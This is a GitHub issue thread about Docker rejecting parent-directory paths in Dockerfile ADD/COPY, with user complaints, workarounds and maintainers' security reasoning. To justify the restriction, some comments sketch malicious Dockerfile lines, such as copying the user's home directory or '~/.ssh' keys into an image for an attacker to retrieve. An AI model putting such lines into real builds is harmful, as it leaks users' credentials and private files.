Moby: Add with relative path to parent directory fails with "Forbidden path"

38

If you have an ADD line in the Dockerfile which points to a parent directory, the build of the image fails with the message "Forbidden path".

Example:

FROM tatsuru/debian
ADD ../relative-add/some-file /tmp/some-file

Gives:

$ ../bundles/0.6.6-dev/binary/docker-0.6.6-dev build .
Uploading context 20480 bytes
Step 1 : FROM tatsuru/debian
 ---> 25368de90486
Step 2 : ADD ../relative-add/some-file /tmp/some-file
Error build: Forbidden path: /tmp/relative-add/some-file

I would expect the file to be written to /tmp/some-file, not /tmp/relative-add/some-file.

Sjord picture Sjord  ·  18 Nov 2013

Most helpful comment

137

I find this behavior fairly frustrating, especially for "meta" Dockerfiles. E.g. I have a /dev folder I do most work in, and I want a /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It's very annoying that this Dockerfile is not allowed to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

wwoods picture wwoods  ·  17 Feb 2014

All comments

24

The build actually happens in /tmp/docker-12345, so a relative path like ../relative-add/some-file is relative to /tmp/docker-12345. It would thus search for /tmp/relative-add/some-file, which is also shown in the error message. It is not allowed to include files from outside the build directory, so this results in the "Forbidden path" message.

It was not clear to me that the directory is moved to another directory in /tmp before the build, or that the paths are resolved after moving the directory. It would be great if this could be fixed, or if the error message could be clearer. For example: "relative paths outside the sandbox are not currently supported" when supplying a relative path, or "The file %s is outside the sandbox in %s and cannot be added" instead of "Forbidden path".

Sjord picture Sjord  ·  18 Nov 2013
0

#2692 is a good first pass at making this clearer.

tianon picture tianon  ·  18 Nov 2013
79

Sorry to hijack, but this seems completely broken to me. I've got a grand total of about 2 hours of Docker experience, so this is more likely a problem with my understanding than with Docker.

I'm going to be creating approximately 10 images from our source tree. But to be able to use the ADD command, I would have to put the Dockerfile in the root of the tree, so only 1 image could be built. Not to mention the fact that this would result in a context of close to 100 megabytes.

I could do an ADD with URLs, but this would make it much more difficult for devs to create images for testing purposes.

Another option would be to add source to the image via volumes instead of adding it, but this really seems contrary to the spirit of Docker.

It seems to me that one partial, easy solution would be to modify the build command so that the context and the Dockerfile could be specified separately.
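
For illustration, a hypothetical invocation with such a split might look like this (both flags are made up and did not exist at the time):

docker build -t my/service-a --context ../src --dockerfile build/serviceA/Dockerfile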

bryanlarsen picture bryanlarsen  ·  27 Nov 2013
0

Is there any reason for that change? Why can't we add files from the parent folder?

karellm picture karellm  ·  19 Dec 2013
137

I find this behavior fairly frustrating, especially for "meta" Dockerfiles. E.g. I have a /dev folder I do most work in, and I want a /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It's very annoying that this Dockerfile is not allowed to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

wwoods picture wwoods  ·  17 Feb 2014
4

Another note - the only possible workaround I've found is to symlink the Dockerfile to the root /dev folder. This results in a very long and resource intensive "Uploading context" stage, which appears to (quite needlessly) copy all of the project directories to a temporary location. If the point of containers is isolation, and Dockerfiles (rightfully) don't seem to allow interacting with the build system, why does Docker need to copy all of the files? Why does it copy files that are not referenced in the Dockerfile at all?

wwoods picture wwoods  ·  17 Feb 2014
3

@wwoods the short answer is that the docker client does not parse the Dockerfile. It tgz's the context (current dir and all subdirs) up, passes it all to the server, which then uses the Dockerfile in the tgz to do the work.
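
In other words, a plain docker build . is roughly equivalent to packing the directory yourself and piping it to the daemon:

tar -czf - . | docker build -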

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
66

That seems pretty flawed, in that it greatly restricts the viable scope of Dockerfiles. Specifically, it disallows Dockerfiles layered on top of existing code configurations, forcing users to structure their code around the Dockerfile rather than the other way around. I understand the reasoning behind allowing the daemon to be on a remote server, but it seems like it would greatly improve Docker's flexibility to parse the Dockerfile and upload only specified sections. This would enable relative paths and reduce bandwidth in general, while making usage more intuitive (the current behavior is not very intuitive, particularly when playing on a dev box).

wwoods picture wwoods  ·  18 Feb 2014
20

Would it be possible to add an option flag that allows users to manually add specific directories to expand the context?

waysidekoi picture waysidekoi  ·  18 Feb 2014
0

That would work, but again way less intuitive than just parsing the Dockerfile. Also, you're wasting a lot of upload bytes for no reason by uploading a lot of files you don't necessarily use.

wwoods picture wwoods  ·  18 Feb 2014
-258

@wwoods - even if the client were to parse the Dockerfile and work out what files to send and which to discard, we still can't afford to bust out of the current directory and let your builder access your client's entire file system.

There are other solutions to your scenario that don't increase our insecurity footprint.

either way, restricting the Dockerfile to the current context is not going to change, so I'm going to close this.

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
117

How is it insecure to allow the builder to access files readable to the user? Why are you superseding linux file security? Please realize that this greatly limits the use cases of Docker and makes it much less enjoyable to add to existing workflows.

wwoods picture wwoods  ·  18 Feb 2014
-5

@wwoods I set up a GitHub repository with code and a Dockerfile in it, you clone it to ~/code/gh-repos/, cd to ~/foobarbaz and run docker build -t foobarbaz .. Let's say I'm a bad guy and I add something like this to the Dockerfile: ADD .. /foo. The image will now contain your entire home directory and anything you might have there. Let's say the resulting image also ends up on the Internet on some registry. Everyone who has the image also has your data - browser history & cookies, private documents, passwords, public and private SSH keys, some internal company data and some personal data.

We're not going to allow Docker ADD to bust out of its context via .. or anything like it.

unclejack picture unclejack  ·  18 Feb 2014
6

Gotcha... still really need some workaround for this issue. Not being able to have a Dockerfile refer to its parents sure limits usage. Even if there's just a very verbose and scary flag to allow it, not having the option makes Docker useless for certain configurations (again, particularly when you have several images you want to build off of a common set of code). And the upload bandwidth is still a very preventable problem with the current implementation.

wwoods picture wwoods  ·  18 Feb 2014
12

How about my suggestion of adding an option to the build command so that the root directory can be specified as a command line option? That won't break any security, and should cover every use case discussed here.

bryanlarsen picture bryanlarsen  ·  18 Feb 2014
0

Sounds good to me. Most confusing part would be the paths in the Dockerfile now "seem" incorrect because they are relative to a potentially unexpected root. But, since that root path is on the command line, it would be pretty easy to see what was going wrong. And a simple comment in the Dockerfile would suffice; maybe even an EXPECTS root directive or something along those lines to provide a friendly error message if the Dockerfile were run without a specified root directory.

wwoods picture wwoods  ·  18 Feb 2014
-23

first up, when I want to build several images from common code, I create a common image that brings the code into that image, and then build FROM that. more significantly, I prefer to build from a version controlled source - ie docker build -t stuff http://my.git.org/repo - otherwise I'm building from some random place with random files.

fundamentally, no, when I put on my black-hat, I don't just give you a Dockerfile, I tell you what command to run.

let me re-iterate. there are other ways to solve your issues, and making docker less secure is not the best one.

SvenDowideit picture SvenDowideit  ·  18 Feb 2014
3

Which means you now have two repositories: one that contains the build scripts, and another containing the code. Which have to be properly synchronized. You can use git submodules or git subtrees or ad hoc methods, but all of those options have serious drawbacks. There are many reasons, some good, some bad, that corporations tend to have a single repository containing everything. AFAICT, Facebook is one example of a place that only has a single source repository that contains everything.

bryanlarsen picture bryanlarsen  ·  18 Feb 2014
3

Sometimes you definitely do want to build from a random place with random files - generating a local test image not based off of a commit, for instance. If you have a different testing server or just want to run several different tests at once locally without worrying about database interactions between them, this would be really handy. There's also the issue where Dockerfiles can only RUN commands they have all information for - if your versioned remote source is password / key protected, this means you'd have to give your Docker image the password / key information anyhow to perform a build strictly with Docker.

There might be ways to solve these issues, but that doesn't mean they're pleasant, intuitive, or particularly easy to track down. I don't think docker would be less secure by allowing a change of context on the command line. I understand the reasons for not transparently stepping outside of the build context. On the other hand, not knowing what you're running will always be a security risk unless you're running it in a virtual machine or container anyway. To get around the Dockerfile limitations, packages might have to ship with a Makefile or script that could easily commit the very offenses you're trying to avoid. I don't think that the "docker build" command is the right place for the level of security you're talking about. Making it harder to use / require more external scaffolding makes it more tempting to step outside of Docker for the build process, exacerbating the exact issues you're worried about.

wwoods picture wwoods  ·  18 Feb 2014
0

An alternative approach is to let you use any Dockerfile from a given context. This keeps things secure but also increases flexibility. I'm looking into this now, you can track here #2112

thedeeno picture thedeeno  ·  18 Feb 2014
8

That would work fine; I'll just point out the security implications are the same. From my perspective that's fine though, in that the context change is very transparent on the command line.

As for why they're the same, you have:

docker build -f Dockerfile ..

Equivalent to the aforementioned

docker build -c .. .

I do like the Dockerfile / context specification split in #2112 better though. Good luck with that :) Hopefully it gets merged in.

wwoods picture wwoods  ·  18 Feb 2014
0

I have the following directory structure:

foo/Dockerfile
foo/shared
foo/shared/bar

in the Dockerfile I have:
ADD shared ./imported

if I cd foo and docker build . I get:

build: Forbidden path outside the build context: shared (/mnt/sda1/tmp/docker-build689526572/shared)

as I understood it foo/ is the context of my build so shared should _not_ be outside the context..?

I don't understand what is wrong here. The example I copied from does ADD . ./somedir which I was trying to avoid, and that doesn't work either when I try to do it. Neither does ADD ./shared ./somedir.

anentropic picture anentropic  ·  22 Feb 2014
0

if I try to build the example I was working from (docker-dna/rabbitmq) it throws the same error too, so it's not just my modified version

I am using boot2docker on OSX

anentropic picture anentropic  ·  22 Feb 2014
0

Oh, it's this https://github.com/boot2docker/boot2docker/issues/143

works after upgrading boot2docker to new version

anentropic picture anentropic  ·  22 Feb 2014
0

I found that the Docker Gradle Plugin provides a nice solution to this problem. There is also a good example project by Spring.

willis7 picture willis7  ·  25 Apr 2015
82

-1 to nannies that want to shorten my rope because I might hang myself with it

ReinsBrain picture ReinsBrain  ·  20 Oct 2015
0

It'd be nice to figure out a better solution or workaround for this... doing something like what @hellais is doing in TheTorProject is pretty gnarly. This is a significant hamper to using Dockerfiles for testing within isolated test/ subdirectories of a project.

jamesob picture jamesob  ·  30 Oct 2015
0

Having just come across this problem, I think that keeping the entire build within the context of a directory means that builds can be system-independent. If you have the Dockerfile and the directory it's in, you can build the image without having to fuss about with unknown and undeclared dependencies elsewhere on the system.

yoshiwaan picture yoshiwaan  ·  18 Nov 2015
7

There really should be a command line option to allow this, something like "--allow-relative-imports".
Or even better, have a way to specify additional locations for the build context (not substitutes), e.g.: "--additional-paths=/path/a:/path/b:/path/c".

As for the relative paths option, there's no need for it to follow relative paths by default, so no security issue unless enabled.
However, not having it at all is a huge disadvantage that leads to other build tools being wrapped around docker build - which isn't just inconvenient but also totally circumvents this security mechanism, making it useless for these use cases anyway.

ms-xy picture ms-xy  ·  22 Jan 2016
8

I successfully worked around this issue using volumes. Example directory structure:

web/
- Dockerfile -> `ADD . /usr/src/app/`
- (code)

webstatic/
- Dockerfile -> `ADD . /usr/src/app/subdir`
- (code)

compose file excerpt:

web:
  build: ./web/

webstatic:
  build: ./webstatic/
  volumes_from:
    - web

Then in the webstatic code I can access the code from the web container. No need for ADD ../web/ .. in webstatic.

graup picture graup  ·  29 Jan 2016
0

That's a nice modular way to do it.


yoshiwaan picture yoshiwaan  ·  29 Jan 2016
0

@graup: I like your approach. It's a really nice workaround, thanks for sharing that!

ms-xy picture ms-xy  ·  30 Jan 2016
3

@graup It is a very nice workaround, but it covers up a serious design problem.
Thanks for sharing this!
I can't believe the Docker design forces us to have such workarounds, or forces a directory structure on us that is not our choice...
This must be fixed.

Thanks for sharing again.

OferE picture OferE  ·  11 Feb 2016
1

Hi, I found a better solution using compose file version 2 - you can pass the context of the build. So you can place the files wherever you want and just pass them the correct context.
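
For example, something along these lines (the paths are illustrative):

version: '2'
services:
  my_service:
    build:
      context: ../
      dockerfile: setup/my_service.dockerfile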

OferE picture OferE  ·  11 Feb 2016
0

You can pass only one context though, which makes multiple independent includes difficult again; the volumes approach is better suited.

ms-xy picture ms-xy  ·  15 Feb 2016
4

To wrap this up:
There are several options.

  1. Use .gitignore with negative pattern (or ADD?)
*
!directory-i-want-to-add
!another-directory-i-want-to-add

Plus use docker command specifying dockerfiles and context:

docker build -t my/debug-image -f docker-debug .
docker build -t my/serve-image -f docker-serve .
docker build -t my/build-image -f docker-build .
docker build -t my/test-image -f docker-test .

You could also use different gitignore files.

  2. Mount volumes
    Skip sending the context at all; just mount volumes at run time (using -v host-dir:/docker-dir).

So you'd have to:

docker build -t my/build-image -f docker-build . # build `build` image (devtools like gulp, grunt, bundle, npm, etc)
docker run -v output:/output my/build-image build-command # copies files to output dir
docker build -t my/serve-image -f docker-serve . # build production from output dir
docker run my/serve-image # production-like serving from included or mounted dir
docker build -t my/debug-image -f docker-debug . # build debug from output dir
docker run my/debug-image # debug-like serving (uses build-image with some watch magic)

Is that something that people usually do? What are devs' best practices? I'm sorry, I'm quite new to docker. Quite verbose commands there. Does it mean docker isn't suitable for development?

Vanuan picture Vanuan  ·  4 Mar 2016
-25

@Vanuan please consider that the GitHub issue tracker is not a general support / discussion forum, but for tracking bugs and feature requests.

Your question is better asked on

  • forums.docker.com
  • the #docker IRC channel on freenode
  • StackOverflow

Please consider using one of the above

thaJeztah picture thaJeztah  ·  4 Mar 2016
0

https://github.com/six8/dockerfactory uses a YAML file to allow you to control the context (and other build parameters) of docker build.

six8 picture six8  ·  4 Mar 2016
9

-1 Reduces Docker security? What security? It's about portability.

@graup so now you have two containers that have to run on the same host. Docker volumes and volume management is one of its weakest points.

jdennaho picture jdennaho  ·  8 Mar 2016
55

This is a major pain in the ass for us and apparently a lot of people. In our case we are now having to create a separate repo and script around this because Docker won't copy files from a repo of shared code that is symlinked in. I have to agree that Docker should not be worrying about the security aspect. It should trust devs to know what they're doing. There are a million ways to shoot oneself in the foot in development if you don't, but at least we have the option to do it.

And for the record, copying shared common code into a build is not insecure or shooting oneself in the foot. It should be possible.

jwarkentin picture jwarkentin  ·  20 Jun 2016
0

If you have common code and repeated steps for many builds then you have the option of making a base image with the common code and then using that in your FROM statement.
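
A rough sketch of that approach (the image names and paths here are made up):

# common/Dockerfile: bake the shared code into a base image
FROM debian:jessie
COPY . /opt/common

# project-a/Dockerfile: each project builds on top of the base
FROM my-registry/common-base:latest
COPY . /opt/project-a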

yoshiwaan picture yoshiwaan  ·  20 Jun 2016
1

That might do the trick. It's a little annoying to have to build two images instead of one and error-prone if someone forgets but it may be a quicker and easier solution to the problem right now.

jwarkentin picture jwarkentin  ·  20 Jun 2016
0

Also see https://github.com/docker/docker/issues/18789 for some more discussion, background, and a workaround

thaJeztah picture thaJeztah  ·  24 Jun 2016
72

This behaviour is very bizarre and I really don't think it's up to users of Docker to care about why it's implemented the way it's implemented. What matters is that it's highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/
├── docker-compose.yml
├── login-queue
│   ├── Dockerfile
server/
├── login-queue
│   ├── pom.xml
├── login-queue-dependency
│   ├── pom.xml
├── pom.xml
├── 500MB folder

My first attempt was doing relative ADDs in the docker/server/Dockerfile. i.e

ADD ../../server/login-queue /opt/login-queue
ADD ../../server/login-queue-dependency /opt/login-queue-dependency

This did not work, to my surprise. You can't add files outside of the folder you run docker build from. I looked for some alternatives, found the -f option and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here's the issue now: my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access ../login-queue-dependency, so I have to move server/login-queue-dependency into server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.

arianitu picture arianitu  ·  28 Jun 2016
0

@arianitu what if you put login-queue-dependency into login-queue's pom.xml?
In docker-compose you'd build 2 services, one depending on the other. You share it through a Maven repository.

Vanuan picture Vanuan  ·  29 Jun 2016
-18

Put it in the root and use the .dockerignore file


yoshiwaan picture yoshiwaan  ·  29 Jun 2016
9

You can't get around this with symbolic links, either, unfortunately.

dhasenancyngn picture dhasenancyngn  ·  5 Aug 2016
2

Poking the issue once again.

For those still seeking a usable workaround, there was a method stated somewhere above which we adopted some time ago: using a separate repository and git cloning a specific revision in the Dockerfile.
It works great and if you don't mind having a second repository it is a nice workaround.
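
A minimal sketch of that pattern (the repository URL and revision are placeholders):

FROM debian:jessie
RUN apt-get update && apt-get install -y git \
 && git clone https://example.com/org/shared-lib.git /opt/shared-lib \
 && cd /opt/shared-lib \
 && git checkout 1a2b3c4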

The suggestion to put it into the root and use .dockerignore would work if there were a way to specify which file to use as the .dockerignore when running docker build (as is possible for the Dockerfile). Judging by https://docs.docker.com/engine/reference/commandline/build/ that is not possible, and docker-compose does not seem to have an option either: https://docs.docker.com/compose/compose-file/.

Imagine the following structure:

project-root
|------------ library (included by all sub-projects)
|------------ sub-project1
|------------ sub-project2
|------------ sub-project3

You would need one Dockerfile and one .dockerignore file per sub-project. That would be ugly, but acceptable, as it could easily be dealt with using docker-compose. However, as stated above, there seems to be no way to specify the .dockerignore file for a build, which means one would have to rename files before every build (which in turn means no docker-compose).
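
The rename dance itself would look roughly like this (the per-project ignore files are hypothetical):

cp dockerignore.sub-project1 .dockerignore
docker build -t sub-project1 -f sub-project1/Dockerfile .
rm .dockerignore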

ms-xy picture ms-xy  ·  22 Aug 2016
18

To be honest this is quite an annoying "feature". Our workaround was scripting: copying the necessary files before running _docker build_, then removing them.

It would be much easier if you could reference parent folders.

h3smith picture h3smith  ·  28 Aug 2016
0

I don't think the behavior should be changed.
But it would be great to have a tool similar to "docker-compose" for building images.
Workflow could be this:

  • mount source directory
  • build/copy necessary stuff
  • commit image

This way copying/installing files would be a part of your application's build script.

Vanuan picture Vanuan  ·  28 Aug 2016
0

@Vanuan I agree that the current behaviour should not be changed.
However, there could (and in my opinion should) be a command line flag allowing for relative imports. As someone stated somewhere above, there's a multitude of ways to shoot oneself in the foot. All of them less easy to spot than a command line flag required to build an image. Could even have it issue a warning that requires some sort of user input.

ms-xy picture ms-xy  ·  30 Aug 2016
6

Not being able to reference a parent folder makes Docker more complicated than it should be. Undesirable "feature". Why take this choice away from the user?

=> Our work around was with scripting, copying the necessary files before running docker build then removing them.

Thank you for your solution.

superherointj picture superherointj  ·  12 Sep 2016
47

This is so stupid. I need to add specific resources from a few folders, like my built application and my front end resources. Unfortunately docker won't allow you to do ADD ../, and it strangely includes random files I don't specify with ADD when I do it from the parent folder. Why does it do this?

Why do the best practices state that the Dockerfile be in its own empty directory, and then disable relative pathing? That makes no sense.

dessalines picture dessalines  ·  21 Sep 2016
11

Just came up against this problem. Would like a config option to get around this.

davidawad picture davidawad  ·  22 Sep 2016
3

Some info on my use case. I have a docker/ directory with service subdirectories within. So it's like project_root/docker/serviceA/Dockerfile, project_root/docker/serviceB/Dockerfile, etc. I have a project_root/docker/docker-compose.yml file that runs installs on all the services. That's the structure used and it works great, and it is limited solely by the "COPY ../src/ /dest/" limitation in a Dockerfile.

I've had to write a script to copy each project_root/service/ directory into the directory with the docker/service/Dockerfile and run the build, which runs the Dockerfile with the COPY command (and without the "evil" ../ pathing). To me, this limitation seems just plain erroneous. I think a good fix would be to either allow turning it off through a config variable, or just by taking out the limitation completely. The point was made above that if this is a security concern, then the user running docker shouldn't have access to the relative path directory in the first place. I agree with that point. We already have a wheel, so let's use it and not reinvent it instead.
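
A sketch of what such a copy-then-build script might look like (the service names are placeholders):

for service in serviceA serviceB; do
  cp -r "project_root/$service" "project_root/docker/$service/"
  docker build -t "$service" "project_root/docker/$service"
  rm -rf "project_root/docker/$service/$service"
done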

Seems like a config variable would make everybody happy, something like "allowRelativePathCopies: true". My vote would be to have it enabled by default, obviously :smile:

artvandelay982 picture artvandelay982  ·  11 Oct 2016
3

+1 for an option that allows turning off the relative pathing restriction.

It's always a good idea to have "secure" defaults, no need to debate that, but by now it should be apparent that there are a bunch of workflows that get forced into ugly workarounds because of this. That would be completely unnecessary with an option to turn it off (while the default behavior would remain the same).

OnixGH picture OnixGH  ·  12 Oct 2016
5

I use tar to work around this.

Say I have directories:

a/Dockerfile
a/libA
b/libB
c/libC

and I am in directory a working on my project, you can do tar cf - . -C ../b libB -C ../c libC | docker build - and you will get a build context which has (at top level) Dockerfile libA libB libC. (-C just changes directory while constructing the tarball)

I was wondering about adding similar syntax to docker build so you can do the same thing, construct the context from a disjoint set of files. This does not have any of the issues that symlink following has from the security point of view, and is relatively simple to implement, just haven't decided on a clear syntax yet, and whether it needs other features.

Note that for complex builds, using tar | docker build - is very flexible, as you can carefully construct build contexts rather than using .dockerignore and it is fast.

justincormack picture justincormack  ·  12 Oct 2016
5

The context for https://github.com/six8/dockerfactory is created by taring up whatever the user defines.

I think the problem of allowing Dockerfile to specify arbitrary directories is someone creating a public Dockerfile could maliciously read things like your SSH keys. Simply add COPY /home/$USER/.ssh .ssh and have the default entrypoint push them somewhere the attacker could retrieve them. So by default, denying anything out of the Dockerfile directory makes sense from a security perspective.

However, for custom build systems, it makes sense to be able to define arbitrary build contexts. Docker does provide a way via tarring up files and piping them in, but that's not declarative like a Dockerfile. You end up having to check in build scripts that handle the tarring and then pass the result to docker. You can't just simply docker build . anymore. So anything someone comes up with to do this will be non-standard and thus more confusing.

I think you'll always need something outside of Dockerfile to be able to pass in arbitrary contexts for security sake. But that doesn't stop docker from creating something like Dockerfactory.yml to be able to do it so it will at least be a standard.

I prefer a declarative approach in a file like Dockerfile and Dockerfactory.yml, but having it build into the docker build command would make it more obvious. Something like:

# --context <host dir>:<container dir>
docker build --context ../../lib-src:/lib-src --context ../src:/src .

--context would mirror --volume and be a concept most people using Docker are familiar with.

A malicious person could still tell you to do docker build --context $HOME:/home . and steal your files. However, you'd have to manually run this command and wouldn't automatically happen because you check out a Dockerfile and run it blindly.

six8 picture six8  ·  12 Oct 2016
1

Not an ideal solution, but if you only need to load a couple of files from a directory on the local filesystem, it's possible to work around this by serving the local filesystem over HTTP:

# Set DOCKER_IP=$(docker-machine ip)
# docker-compose.yml
version: '2'
services:
  http_fs:
    image: python:2-onbuild
    command: sh -c 'cd /fs; python -m SimpleHTTPServer 8080'
    ports:
      - '8080:8080'
    volumes:
      - ..:/fs
  foo:
    build:
      context: docker/foo
      args:
        HTTP_FS: "http://${DOCKER_IP}:8080"
# docker/foo/Dockerfile
ARG HTTP_FS
RUN wget "${HTTP_FS}/somefile"

This requires turning on http_fs ( docker-compose up http_fs) before building foo (docker-compose build foo). AFAIK there isn't a way to declare a build dependency via depends_on in docker-compose.yml

mandrews picture mandrews  ·  20 Oct 2016
4

IMO if Docker is not willing to work with parent directory files for some sort of security reasons, it should work with symlinks in the current directory to parent directory files

e.g.

bar/
   actual-file.sh
foo/
   baz/          << current working directory has symlink to a parent directory
      symlink-to-actual-file
      Dockerfile

right now Docker is calling lstat on a symlink that exists, and it's giving me this error:

lstat symlink-to-actual-file: no such file or directory

if the symlinks are there, permissions should be fine

ORESoftware picture ORESoftware  ·  6 Dec 2016
4

Apparently, quite a few people seem to think that using tar solves this problem.
Good luck trying to use the tar approach with 30 different docker containers, when each needs its own hand-picked context. Especially if they are rebuilt regularly.
You will end up using some sort of build script or ugly workaround. And that's the entire point of this discussion: it should not be necessary to do what we are doing, when the problem could be treated at its source.

ms-xy picture ms-xy  ·  8 Dec 2016
-7

another work-around: forget docker and go higher up the chain using LXD to host your own complete images

ReinsBrain picture ReinsBrain  ·  9 Dec 2016
0

@apcompare I would like to see some numbers to support claim number 2, because I haven't been working on any project using that layout. And yes, we use docker-compose.
I would also like to challenge your claim that any project can easily fit in such a layout. I can instantly think of multiple reasons why that would not work for some projects. (existing build tools / infrastructure, too big of a project, too limiting in its flexibility, ability to deliver hot fixes to older branches (backwards compatibility), programming language(s) restrictions, ....)

ms-xy picture ms-xy  ·  16 Dec 2016
0

Currently I settled on a simple folder structure for my projects :

  • /app/source
  • /app/distribution
  • /app/setup

Where "setup" contains all the docker files together with docker-compose files for production and testing, clean and simple.
The only thing holding me back is this context problem - the context is limited to subdirectories only. And that's frustrating!

Please 💐🐋, add an option to lift this restriction 🗽! Let us change the Dockerfile's context.

Thanks

myuseringithub picture myuseringithub  ·  30 Dec 2016
3

@myuseringithub
Are you new to Docker? Because after using Docker for a year, I figured out that the most effective folder structure to use with Docker is the following:

/app/Dockerfile
/app/dev/Dockerfile

I.e. you only need 2 dockerfiles:

  • one for production-like environment (including qa, staging, etc), where application is built from sources and included in an image
  • one for development-like environment (including test, ci, etc), where source files are mounted to a running container, and image only contains rarely modified dependencies
Vanuan picture Vanuan  ·  30 Dec 2016
8

Thanks, I'm switching to using Docker in swarm mode, and organizing the code is an important part.
I thought changing the dockerfile context to a parent directory was not possible; it turned out that it is. This is what I ended up doing:

Regarding file organization:

/app - _project's root directory_

  • setup - _docker related files, build tools, shellScripts, & tests_
  • source - _raw project code (server & client sides)_
  • distribution - _production ready code_

Regarding "Forbidden path" error:

Running docker-compose up from project root folder, like so:
docker-compose -f ./setup/<docker-compose>.yml up
Inside docker-compose file:

...
    build:
      # Setting context of dockerfile which will be executed.
      context: ../
      dockerfile: ./setup/<dockerfilename>
    # Volume path is relative to docker-compose file, not the dockerfile execution context.
    volumes:
      - ../source/:/app/source/
...

& for running individual dockerfiles:

  • cd to project's root directory
  • docker build -t <imagename> -f setup/nodejsWeb.dockerfile ./
  • docker run -d <imagename>

This way dockerfile/dockercompose can use parent directory in the process of creating images. This is what makes sense for me.

myuseringithub picture myuseringithub  ·  30 Dec 2016
0

Take a look at your docker image size - you'll find it includes everything if you do it from a parent folder. Mine was 1.5GB with all my dev dependencies, which is why I couldn't do it from a parent folder.

dessalines picture dessalines  ·  31 Dec 2016
0

@dessalines thanks, that adds another point to my list why we should have the option to allow parent folders ...

ms-xy picture ms-xy  ·  8 Jan 2017
0

Is there an option to change the running context of an image from the Docker Hub registry?
Something like:

...
image: 
     context: ../
     name: node:latest
... 

And then call it from parent folder (docker-compose -f ./subfolder/docker-compose.yml up). Just like its possible with build command.
Thanks

myuseringithub picture myuseringithub  ·  13 Jan 2017
4

I'll be the thousandth person to mention that this is an issue, but here's my situation.

I'm working in a Haskell codebase that defines a dependency file (stack.yaml) at the root of the project. We have subprojects that are only tangentially related, but everything is built using the global stack.yaml at the project root. I need it in order to build a subproject, but we should have Dockerfiles per subproject, not one for the whole megarepo.

.
├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)

Builds should be local to project-a, for example, but I need the stack.yaml from the parent directory in order to build. This is a huge problem and I, like many others, think there should be a configuration variable or docker flag that allows users to work around this issue.

5outh picture 5outh  ·  1 Feb 2017
0

@5outh the philosophy of Docker is that you should build a shared part from stack.yaml and use FROM in each Dockerfile:

.
├── common
│   ├── Dockerfile
│   ├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)
docker build -t private-registry/project-common:releaseN common/
docker push private-registry/project-common:releaseN

In Dockerfile:

FROM private-registry/project-common:releaseN
...

I.e. you should treat each project as a fully independent piece. Otherwise we'd all end up in the same interdependent pre-docker shit.

Vanuan picture Vanuan  ·  2 Feb 2017
0

There are a number of reasons that doesn't work. The simplest is that you can't use FROM if the base images differ. With Alpine and Debian builds but shared application config, you have to follow one of the wonky solutions outlined throughout this thread.

neclimdul picture neclimdul  ·  2 Feb 2017
0
.
├── common
│   ├── Dockerfile-alpine
│   ├── Dockerfile-debian
│   ├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)
Vanuan picture Vanuan  ·  2 Feb 2017
20

Even after all these years, this silly restriction hasn't been fixed? I swear Docker is growing less appealing by the hour.

festus1973 picture festus1973  ·  9 Feb 2017
-13

@festus1973 read https://github.com/docker/docker/issues/2745#issuecomment-35335357 on the "why". Keep in mind that docker build runs at the daemon, which could be on a remote server. The daemon gets passed the "context", which is an archive (.tar) of the files to use for building, so simply does not have access to anything outside that, because it's not in the archive. In addition, a Dockerfile having _full access_ to your client machine is a major security concern (as has been mentioned in this thread).

Allowing "random" files from the client that triggers the build to be sent to the daemon (for building) requires a complete rewrite of the way the builder works. Alternative approaches (such as an rsync-like approach, where the daemon requests files from the client when needed) are being looked into, but _do_ require a lot of engineering, design, and security audits.

Meanwhile, alternative approaches (admittedly, less convenient) are mentioned in this discussion https://github.com/docker/docker/issues/2745#issuecomment-253230025

thaJeztah picture thaJeztah  ·  9 Feb 2017
-13

@thaJeztah Thanks for being patient to such ignorant comments and keep up the good work!

Vanuan picture Vanuan  ·  9 Feb 2017
4

@Vanuan You're the one working countless hours on open source projects for zero pay and you're calling me ignorant? Really? But yeah, definitely, keep up the "good work." Great business model by the way. Please do keep cranking out that code for us, mate! I'm sure you'll be able to trade in those upvotes you've earned for cash one day, or perhaps a figurine of your favorite sci-fi character.

@thaJeztah Thanks for the useful reply. All I can say in response is to point out the same things that other people in this thread and other forums have already noted:

  • A docker file can't have "full access" to anything. It's just a text file.

  • Most people are running this thing as admin on their own machine. They don't expect to get an 'access denied' error when trying to access their own files.

  • Your description of Docker's design was helpful. That said, even if your docker build engine were running on a different machine, wouldn't that untrusted machine still be subject to the permissions of the builder's local file system? In other words, if a malicious user operating on the machine where the docker builder service is being run tried to surreptitiously insert an ADD/COPY instruction targeting \mylocalMachine\windows\system32\someprivateThing.dat, the attempt would fail on its own due to a permissions denial when trying to execute the ADD/COPY, amiright?

  • Someone pointed to a link in the documentation about this whole "context" concept. It was informative. Most new users aren't going to find that though. They're going to get an "access denied" message when referencing file(s) and folder(s) on their own machine that they know for a fact exist -- and by the nature of the error message will just assume the product is fundamentally broken. If there were at least a helpful error message, perhaps mentioning a keyword like 'context' or better yet, one quick sentence about the unusual folder structuring requirements, it would make a world of difference. Then the user could step back and make a rational decision on whether or not he wants to (a) totally rework the natural existing folder structure he has in place in order to make it Docker centric instead of workflow-centric, or (b) write a program to copy his source files into a standalone Docker-centric folder structure, or (c) move on.

